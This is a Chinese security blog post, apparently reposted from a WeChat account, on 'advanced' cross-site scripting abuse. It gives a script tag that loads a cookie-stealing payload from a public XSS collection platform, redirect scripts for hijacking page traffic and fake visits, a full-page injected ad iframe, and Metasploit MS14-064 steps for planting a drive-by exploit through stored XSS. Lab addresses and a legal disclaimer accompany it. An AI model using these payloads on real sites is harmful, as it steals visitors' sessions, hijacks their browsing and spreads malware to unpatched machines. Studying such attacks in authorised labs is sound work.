XSS高级用法,SEO优化,挂ma,MS14_064

admin 2024年10月28日23:43:46评论12 views字数 2225阅读7分25秒阅读模式
~ 你是沿途,有青山举杯 ~

星河飞雪网络安全人才培养计划,绝对零区,公益免费教学!

白小羽

以下所有的针对XSS的利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作!!!

XSS高级用法,SEO优化,挂ma,MS14_064
image-20241028120755040

学网安,任何泷羽Sec团队,社群答疑,免费教学,内推红队从0-1,绝对0区。

xss平台:https://xssaq.com/

<sCRiPt sRC=//xs.pe/PNb></sCrIpT>
XSS高级用法,SEO优化,挂ma,MS14_064
image-20241027213312253

这里有一个xsslabs,利用我们的payload

XSS高级用法,SEO优化,挂ma,MS14_064
image-20241028120035485

xss平台已上线

XSS高级用法,SEO优化,挂ma,MS14_064
image-20241028120243166

查看功能

XSS高级用法,SEO优化,挂ma,MS14_064
image-20241027213621071

这里面有源码,xss站点的ua头,还有存储用户cookie信息机器的真实IP地址

XSS高级用法,SEO优化,挂ma,MS14_064
image-20241028120307527

地址很明确,是我自己的地址

XSS高级用法,SEO优化,挂ma,MS14_064
image-20241027214149649

广告传播/SEO优化/刷取流量

原理

通过恶意的xss代码将正常的页面跳转到目的地的页面,利用网站进行重定向实现引流、广告位传播等等。

实操

恶意刷取访问量,网页直接跳转

<script type="text/javascript">window.location.href="跳转的目的地址";</script>
<script type="text/javascript">window.location.replace("跳转的目的地址");</script>
<script type="text/javascript">window.location.assign("跳转的目的地址");</script>
XSS高级用法,SEO优化,挂ma,MS14_064
image-20241027215902474

注入成功,再次访问这个页面就会自动跳转到你的页面,从而达到访问量+1

XSS高级用法,SEO优化,挂ma,MS14_064
QQ20241027-2269

第二种,网页延迟跳转

<script type="text/javascript">
  function jumurl(){
  window.location.href = 'https://www.baidu.com';
  }
  setTimeout(jumurl,3000);
</script>

恶意广告展示(需要5块钱吃外卖的记得扫个码嘞,美团优惠卷+平台双减)

<script>document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='2000' height='5000' allowTransparency src=https://pic1.zhimg.com/v2-656b7df981ea18d18f196995f477d75d_xll.jpg?source=32738c0c&needBackground=1></iframe>");</script>
XSS高级用法,SEO优化,挂ma,MS14_064
image-20241028104827270

三、网页挂马/权限提升(MS14_064)

目的

通过木马服务器(kali)搭建生成一个恶意URL地址,并通过存储型XSS挂到页面中。只要存在未打相应补丁的用户访问了挂马页面,恶意攻击者便获取到了受害者的控制权限(重点在于目的系统是否打了相应补丁)

环境

木马服务器(Kali  MS14-064  IP:192.168.7.129) 受害者(Windows Server 2003 R2  IP:192.168.7.136) 存在 XSS 的服务器(Win10 DVWA靶机 IP:192.168.1.103)

白小羽

MS14_064:受影响的操作系统版本有:Windows Vista、Windows Server 2012、Windows Server 2008、Windows RT、Windows 8.1、Windows 8 以及 Windows 7.

打开msf

XSS高级用法,SEO优化,挂ma,MS14_064
image-20241028111203426

搜索 ms14_064

XSS高级用法,SEO优化,挂ma,MS14_064
image-20241028111330696

依次设置好参数

XSS高级用法,SEO优化,挂ma,MS14_064
image-20241028111631247

没有成功,不知道为什么,我win7补丁都卸载了,这里只做演示,可以参考下文

https://blog.csdn.net/theRavensea/article/details/136793078
XSS高级用法,SEO优化,挂ma,MS14_064
image-20241028114950095

XSS插入地址

这个时候就能利用存储型xss漏洞将木马服务器生成的地址插入到网站中,这样只要有人的电脑存在该漏洞,就能上线:

XSS高级用法,SEO优化,挂ma,MS14_064
image-20241028115424561

可自行测试,我这里不是全新的win7,没有成功

XSS高级用法,SEO优化,挂ma,MS14_064
image-20241028120337203

学习于:

https://blog.csdn.net/Aaron_Miller/article/details/105918848

往期推荐

【渗透测试】DC-3提权靶机综合渗透教程

一款开源持续更新的后渗透免杀框架

Web安全中的XSS攻击详细教学,Xss-Labs靶场通关全教程(建议收藏)(一)

24年最新JetBrains全家桶激活到2099年工具分享

【内网渗透】CobaltStrike与MSF联动互相上线的方式

原文始发于微信公众号(泷羽Sec):XSS高级用法,SEO优化,挂ma,MS14_064

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月28日23:43:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   XSS高级用法,SEO优化,挂ma,MS14_064https://cn-sec.com/archives/3324137.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息